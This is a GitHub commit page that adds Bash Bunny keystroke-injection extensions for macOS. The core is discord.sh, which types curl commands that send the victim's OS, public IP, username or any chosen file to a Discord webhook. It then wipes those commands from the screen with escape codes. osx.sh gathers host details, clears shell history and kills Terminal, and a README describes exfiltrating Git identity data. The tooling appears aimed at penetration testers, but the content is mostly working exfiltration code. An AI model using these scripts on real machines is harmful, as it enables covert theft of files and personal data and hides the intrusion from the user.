Skip to content

Commit

Permalink
Merge pull request #650 from quentinlamamy/master
Browse files Browse the repository at this point in the history 
Submit Discord exfiltration extension + Github Information Exfiltration Payload
  • Loading branch information
@hak5peaks
hak5peaks authored Sep 3, 2024
2 parents e6c3876 + 5ce34d6 commit 2570810
Show file tree
Hide file tree
Showing 4 changed files with 452 additions and 0 deletions.
86 changes: 86 additions & 0 deletions payloads/extensions/discord.sh
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Discord Extension
# Description: Interact with discord webhook to exfiltrate text or files
# Author: quentin_lamamy <[email protected]>
# Version: 1.0
# Category: Extension
#
# To use this extension, you need to create a webhook on discord and get the webhook id and token
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"

function DISCORD() {

case $1 in

# @desc Initialize the exfiltration session by posting an embed message on discord with host information
# @usage DISCORD INIT
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
"INIT")

curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
curl_header="Content-Type: application/json"

Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location '$curl_location'"
Q STRING " --header '$curl_header'"
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
Q STRING "'\${BB_HOST_OS}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V4}'"
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
Q STRING "'\${BB_HOST_IP_V6}'"
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
Q STRING "'\${BB_HOST_USER}'"
Q STRING "\",\"inline\":true}]"
Q STRING "}]}'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER

;;

"SEND")

case $2 in

# @desc Send a message to discord via webhook
# @usage DISCORD SEND MSG $yourMessage
"MSG")

if [[ "$3" == *"$"* ]]; then
message="'$3'"
else
message=$3
fi

Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;

# @desc Send a file to discord via webhook
# @usage DISCORD SEND FILE $yourFilePath
"FILE")
Q STRING "printf '\e7'"
Q ENTER
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
Q ENTER
Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER
;;

esac

;;

esac
}

export -f DISCORD
278 changes: 278 additions & 0 deletions payloads/extensions/osx.sh
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,278 @@
#!/bin/bash
#
# Title: OSX Extension
# Description: Allow a bunch of osx interaction
# Author: quentin_lamamy <[email protected]>
# Version: 2.0
# Category: Extension

function OSX() {

case $1 in

"TERMINAL")

case $2 in

# @desc Open a terminal
# @usage OSX TERMINAL OPEN
"OPEN")
Q GUI SPACE
Q STRING terminal
Q ENTER
;;

# @desc Initialize the terminal
# Make the PS1 nicer (just because I like it)
# Grab Host information and store it in BB_OSX vars
# @usage OSX TERMINAL INIT
# @info This command need a focused terminal
"INIT")

Q STRING "bash"
Q ENTER
Q STRING "clear"
Q ENTER
Q STRING "printf '\e7'"
Q ENTER
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
Q ENTER
Q STRING 'BB_HOST_USER=$(whoami)'
Q ENTER

Q STRING 'BB_HOST_NAME=$(hostname)'
Q ENTER

Q STRING "BB_HOST_OS='OSX'"
Q ENTER

Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
Q ENTER

Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
Q ENTER

Q STRING "printf '\e8\e[1A\e[0J'"
Q ENTER

;;

# @desc Minimize the terminal
# @usage OSX TERMINAL MINIMIZE
# @info This command need a focused terminal
"MINIMIZE")
Q STRING 'printf \e[2t'
Q ENTER
;;

# @desc Resize the focused terminal
# @usage OSX TERMINAL RESIZE $width $height
# @param <integer> $width The terminal width
# @param <integer> $height The terminal height
# @info This command need a focused terminal
"RESIZE")
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;

# @desc Clear the focused terminal
# @usage OSX TERMINAL ZOOM
# @info This command need a focused terminal
"CLEAR")
Q STRING clear
Q ENTER
;;

# @desc Close all terminal
# @usage OSX TERMINAL CLOSE
# @info This command need a focused terminal
"CLOSE")
Q STRING history -c
Q ENTER
Q STRING killall Terminal
Q ENTER
;;

# @desc Change terminal window name
# @usage OSX TERMINAL NAME <WINDOW_NAME>
# @info This command need a focused terminal
"NAME")
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;

esac

;;

"NETWORK")

case $2 in

"WIFI")

case $3 in

# @desc Enable wifi
# @usage OSX NETWORK WIFI ENABLE
"ENABLE")
Q STRING "networksetup -setairportpower en0 on"
Q ENTER
;;

# @desc Disable wifi
# @usage OSX NETWORK WIFI DISABLE
"DISABLE")
Q STRING "networksetup -setairportpower en0 off"
Q ENTER
;;

# @desc Connect to a wifi network
# @usage OSX NETWORK CONNECT $ssid $password
# @arg <string> Wifi SSID
# @arg <string> Wifi Password
"CONNECT")
Q STRING "networksetup -setairportnetwork en0 $4 $5"
Q ENTER
;;

esac

;;

"ETHERNET")
;;

esac
;;

"SESSION")

case $2 in

# @desc Shutdown the computer
# @usage OSX SESSION SHUTDOWN
"SHUTDOWN")
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
Q ENTER
;;

# @desc Restart the computer
# @usage OSX SESSION RESTART
"RESTART")
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
Q ENTER
;;

# @desc Lock the computer
# @usage OSX SESSION LOCK
"LOCK")
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
Q ENTER
;;

# @desc Logout current session
# @usage OSX SESSION LOGOUT
"LOGOUT")
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
Q ENTER
;;

"GET_USER")
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
Q STRING 'BB_OSX_USER=$(whoami)'
Q ENTER
;;

esac

;;

"SOUND")

case $2 in

"PLAY")
Q STRING "afplay $3"
;;

# @desc Change the computer volume
# @usage OSX MISC VOLUME $volumeValue
# @arg <integer> An integer between 0 and 10
"VOLUME")
Q STRING "osascript -e 'set Volume $3'"
Q ENTER
;;

esac
;;

"NOTIFICATION")

case $2 in

"CLEAR")
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;

"DISPLAY")

if [ -z $6]; then
$6=${1:-"Purr"}
fi

Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
Q ENTER
;;

esac


;;

"MISC")

case $2 in

# @desc Show or hide desktop icon
# @usage OSX MISC DESKTOP_ICON $action
# @arg <string> HIDE | void
"DESKTOP_ICON")
if [ $3 == "HIDE" ]; then
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
Q ENTER
else
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
Q ENTER
fi
;;

# @desc Change wallpaper with the specified url image
# @usage OSX MISC WALLPAPER_URL
"WALLPAPER_URL")
Q STRING "cd ~/Desktop"
Q ENTER
Q STRING "curl $3 > img.bb"
Q ENTER
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
Q ENTER
;;

# @desc Say something in the way of bigben
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
# @info Need a focused terminal
"SAY")
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
Q ENTER
;;

esac

;;

esac

}

export -f OSX
30 changes: 30 additions & 0 deletions payloads/library/exfiltration/githubExfiltration/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
<div align="center">

# Github Information Exfiltration
**Get Git user name and email from the Git global config and exfiltrate them**

![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)

![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)

</div>

<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>

# Dependency

* OSX Extension by quentin_lamamy

# Changelog
v1.0 :
* :tada: Release on 2023/08/20

# Contributing
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)

# License
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>

# Support
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
Loading

0 comments on commit 2570810

Please sign in to comment.